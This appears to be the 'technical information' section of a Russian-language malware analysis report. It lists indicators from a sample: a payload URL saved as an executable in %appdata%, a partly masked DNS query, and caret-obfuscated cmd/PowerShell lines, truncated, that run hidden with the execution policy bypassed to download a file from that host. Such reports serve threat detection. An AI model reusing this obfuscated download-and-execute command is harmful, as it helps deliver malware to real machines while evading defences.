Техническая информация
- https://blogwriter.co.in/text/ferry.bin как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^Wer^S^h^e^LL^.exe -^EXeC^U^t^i^ON^pO^liCY bYpa^SS ^-^nOP^Ro^fIlE -Wi^n^d^OwS^tY^Le^ HId^DeN ^(NEW-Objec^t SYSTe^M.^neT^.wEbc^lI^enT).dOWn^lO^ad^FI^le(^'https://blogwriter....
- DNS ASK bl####iter.co.in
- '<SYSTEM32>\cmd.exe' /c "P^O^Wer^S^h^e^LL^.exe -^EXeC^U^t^i^ON^pO^liCY bYpa^SS ^-^nOP^Ro^fIlE -Wi^n^d^OwS^tY^Le^ HId^DeN ^(NEW-Objec^t SYSTe^M.^neT^.wEbc^lI^enT).dOWn^lO^ad^FI^le(^'https://blogwriter....' (со скрытым окном)